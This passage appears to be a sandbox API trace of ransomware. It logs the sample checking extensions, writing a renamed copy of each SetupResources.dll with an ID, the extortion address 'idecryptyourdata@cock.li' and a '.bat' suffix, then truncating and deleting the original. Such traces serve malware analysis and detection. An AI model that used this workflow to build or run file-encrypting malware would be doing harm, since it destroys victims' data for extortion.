(lpString1=".docx", lpString2="s.dll") returned -1 [0046.977] lstrlenW (lpString=".pdf") returned 4 [0046.977] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.978] lstrlenW (lpString=".xls") returned 4 [0046.978] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.978] lstrlenW (lpString=".xlsx") returned 5 [0046.978] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0046.978] lstrlenW (lpString=".ppt") returned 4 [0046.978] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.978] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0046.978] lstrlenW (lpString=".zip") returned 4 [0046.978] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.978] lstrlenW (lpString=".rar") returned 4 [0046.978] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.978] lstrlenW (lpString=".bz2") returned 4 [0046.978] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.978] lstrlenW (lpString=".7z") returned 3 [0046.978] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.978] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0046.978] lstrlenW (lpString=".dbf") returned 4 [0046.978] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.978] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0046.978] lstrlenW (lpString=".1cd") returned 4 [0046.978] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.978] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0046.978] lstrlenW (lpString=".jpg") returned 4 [0046.978] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.978] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0046.978] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0046.978] lstrlenW (lpString=".doc") returned 4 [0046.978] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.978] lstrlenW (lpString=".docx") returned 5 [0046.979] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0046.979] lstrlenW (lpString=".pdf") returned 4 [0046.979] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.979] lstrlenW (lpString=".xls") returned 4 [0046.979] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.979] lstrlenW (lpString=".xlsx") returned 5 [0046.979] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0046.979] lstrlenW (lpString=".ppt") returned 4 [0046.979] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.979] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0046.979] lstrlenW (lpString=".zip") returned 4 [0046.979] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.979] lstrlenW (lpString=".rar") returned 4 [0046.979] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.979] lstrlenW (lpString=".bz2") returned 4 [0046.979] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.979] lstrlenW (lpString=".7z") returned 3 [0046.979] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.979] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0046.979] lstrlenW (lpString=".dbf") returned 4 [0046.979] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.979] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0046.979] lstrlenW (lpString=".1cd") returned 4 [0046.979] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.979] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0046.979] lstrlenW (lpString=".jpg") returned 4 [0046.979] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.980] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0046.980] lstrlenW (lpString="SetupResources.dll") returned 18 [0046.980] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0046.980] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=17752) returned 1 [0046.980] CloseHandle (hObject=0x2c8) returned 1 [0046.980] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll")) returned 0x80 [0046.980] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.980] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0046.980] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.980] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.981] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0046.982] GetLastError () returned 0x0 [0046.982] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x4558, lpOverlapped=0x0) returned 1 [0046.984] WriteFile (in: hFile=0x2e0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x4560, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x4560, lpOverlapped=0x0) returned 1 [0046.986] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0046.986] WriteFile (in: hFile=0x2e0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0xf8, lpOverlapped=0x0) returned 1 [0046.986] SetEndOfFile (hFile=0x2e0) returned 1 [0046.986] CloseHandle (hObject=0x2e0) returned 1 [0046.987] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.987] SetEndOfFile (hFile=0x2c8) returned 1 [0046.988] CloseHandle (hObject=0x2c8) returned 1 [0046.988] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0046.988] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll")) returned 1 [0046.989] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0046.989] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0046.989] lstrlenW (lpString=".doc") returned 4 [0046.989] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.989] lstrlenW (lpString=".docx") returned 5 [0046.989] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0046.989] lstrlenW (lpString=".pdf") returned 4 [0046.989] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.989] lstrlenW (lpString=".xls") returned 4 [0046.989] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.989] lstrlenW (lpString=".xlsx") returned 5 [0046.989] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0046.989] lstrlenW (lpString=".ppt") returned 4 [0046.989] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.989] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0046.989] lstrlenW (lpString=".zip") returned 4 [0046.989] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.989] lstrlenW (lpString=".rar") returned 4 [0046.989] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.989] lstrlenW (lpString=".bz2") returned 4 [0046.989] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.989] lstrlenW (lpString=".7z") returned 3 [0046.989] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.989] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0046.989] lstrlenW (lpString=".dbf") returned 4 [0046.990] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.990] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0046.990] lstrlenW (lpString=".1cd") returned 4 [0046.990] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.990] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0046.990] lstrlenW (lpString=".jpg") returned 4 [0046.990] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.990] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0046.990] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0046.990] lstrlenW (lpString=".doc") returned 4 [0046.990] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.990] lstrlenW (lpString=".docx") returned 5 [0046.990] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0046.990] lstrlenW (lpString=".pdf") returned 4 [0046.990] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.990] lstrlenW (lpString=".xls") returned 4 [0046.990] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.990] lstrlenW (lpString=".xlsx") returned 5 [0046.990] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0046.990] lstrlenW (lpString=".ppt") returned 4 [0046.990] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.990] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0046.990] lstrlenW (lpString=".zip") returned 4 [0046.990] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.990] lstrlenW (lpString=".rar") returned 4 [0046.990] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.990] lstrlenW (lpString=".bz2") returned 4 [0046.990] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.991] lstrlenW (lpString=".7z") returned 3 [0046.991] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.991] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0046.991] lstrlenW (lpString=".dbf") returned 4 [0046.991] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.991] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0046.991] lstrlenW (lpString=".1cd") returned 4 [0046.991] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.991] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0046.991] lstrlenW (lpString=".jpg") returned 4 [0046.991] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.991] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0046.991] lstrlenW (lpString="SetupResources.dll") returned 18 [0046.991] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0046.992] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=18264) returned 1 [0046.992] CloseHandle (hObject=0x2c8) returned 1 [0046.992] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll")) returned 0x80 [0046.992] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.992] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0046.992] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.992] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.992] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0046.994] GetLastError () returned 0x0 [0046.994] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x4758, lpOverlapped=0x0) returned 1 [0046.996] WriteFile (in: hFile=0x2e0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x4760, lpOverlapped=0x0) returned 1 [0046.997] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0046.998] WriteFile (in: hFile=0x2e0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0xf8, lpOverlapped=0x0) returned 1 [0046.998] SetEndOfFile (hFile=0x2e0) returned 1 [0046.998] CloseHandle (hObject=0x2e0) returned 1 [0046.999] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.999] SetEndOfFile (hFile=0x2c8) returned 1 [0047.000] CloseHandle (hObject=0x2c8) returned 1 [0047.000] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.000] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll")) returned 1 [0047.001] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0047.001] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0047.001] lstrlenW (lpString=".doc") returned 4 [0047.001] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.001] lstrlenW (lpString=".docx") returned 5 [0047.001] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0047.001] lstrlenW (lpString=".pdf") returned 4 [0047.001] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.001] lstrlenW (lpString=".xls") returned 4 [0047.001] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.001] lstrlenW (lpString=".xlsx") returned 5 [0047.001] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0047.001] lstrlenW (lpString=".ppt") returned 4 [0047.001] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.001] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0047.001] lstrlenW (lpString=".zip") returned 4 [0047.001] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.001] lstrlenW (lpString=".rar") returned 4 [0047.001] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.001] lstrlenW (lpString=".bz2") returned 4 [0047.001] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.001] lstrlenW (lpString=".7z") returned 3 [0047.001] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.001] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0047.001] lstrlenW (lpString=".dbf") returned 4 [0047.001] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.001] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0047.002] lstrlenW (lpString=".1cd") returned 4 [0047.002] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.002] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0047.002] lstrlenW (lpString=".jpg") returned 4 [0047.002] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.002] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0047.002] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0047.002] lstrlenW (lpString=".doc") returned 4 [0047.002] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.002] lstrlenW (lpString=".docx") returned 5 [0047.002] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0047.002] lstrlenW (lpString=".pdf") returned 4 [0047.002] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.002] lstrlenW (lpString=".xls") returned 4 [0047.002] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.002] lstrlenW (lpString=".xlsx") returned 5 [0047.002] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0047.002] lstrlenW (lpString=".ppt") returned 4 [0047.002] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.002] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0047.002] lstrlenW (lpString=".zip") returned 4 [0047.002] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.002] lstrlenW (lpString=".rar") returned 4 [0047.002] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.002] lstrlenW (lpString=".bz2") returned 4 [0047.002] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.002] lstrlenW (lpString=".7z") returned 3 [0047.002] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.002] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0047.002] lstrlenW (lpString=".dbf") returned 4 [0047.002] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.003] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0047.003] lstrlenW (lpString=".1cd") returned 4 [0047.003] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.003] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0047.003] lstrlenW (lpString=".jpg") returned 4 [0047.003] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.003] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0047.003] lstrlenW (lpString="SetupResources.dll") returned 18 [0047.003] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0047.003] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=18264) returned 1 [0047.003] CloseHandle (hObject=0x2c8) returned 1 [0047.003] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll")) returned 0x80 [0047.003] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.003] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0047.004] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.004] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.004] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0047.522] GetLastError () returned 0x0 [0047.522] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x4758, lpOverlapped=0x0) returned 1 [0047.524] WriteFile (in: hFile=0x2e0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x4760, lpOverlapped=0x0) returned 1 [0047.525] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.525] WriteFile (in: hFile=0x2e0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0xf8, lpOverlapped=0x0) returned 1 [0047.525] SetEndOfFile (hFile=0x2e0) returned 1 [0047.525] CloseHandle (hObject=0x2e0) returned 1 [0047.526] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.526] SetEndOfFile (hFile=0x2c8) returned 1 [0047.527] CloseHandle (hObject=0x2c8) returned 1 [0047.527] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.527] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll")) returned 1 [0047.528] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0047.528] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0047.528] lstrlenW (lpString=".doc") returned 4 [0047.528] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.528] lstrlenW (lpString=".docx") returned 5 [0047.528] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0047.528] lstrlenW (lpString=".pdf") returned 4 [0047.528] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.528] lstrlenW (lpString=".xls") returned 4 [0047.528] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.528] lstrlenW (lpString=".xlsx") returned 5 [0047.528] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0047.528] lstrlenW (lpString=".ppt") returned 4 [0047.528] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.528] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0047.528] lstrlenW (lpString=".zip") returned 4 [0047.528] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.528] lstrlenW (lpString=".rar") returned 4 [0047.528] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.528] lstrlenW (lpString=".bz2") returned 4 [0047.528] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.528] lstrlenW (lpString=".7z") returned 3 [0047.528] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.528] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0047.528] lstrlenW (lpString=".dbf") returned 4 [0047.529] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.529] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0047.529] lstrlenW (lpString=".1cd") returned 4 [0047.529] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.529] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0047.529] lstrlenW (lpString=".jpg") returned 4 [0047.529] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.529] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0047.529] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0047.529] lstrlenW (lpString=".doc") returned 4 [0047.529] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.529] lstrlenW (lpString=".docx") returned 5 [0047.529] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0047.529] lstrlenW (lpString=".pdf") returned 4 [0047.529] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.529] lstrlenW (lpString=".xls") returned 4 [0047.529] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.529] lstrlenW (lpString=".xlsx") returned 5 [0047.529] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0047.529] lstrlenW (lpString=".ppt") returned 4 [0047.529] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.529] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0047.529] lstrlenW 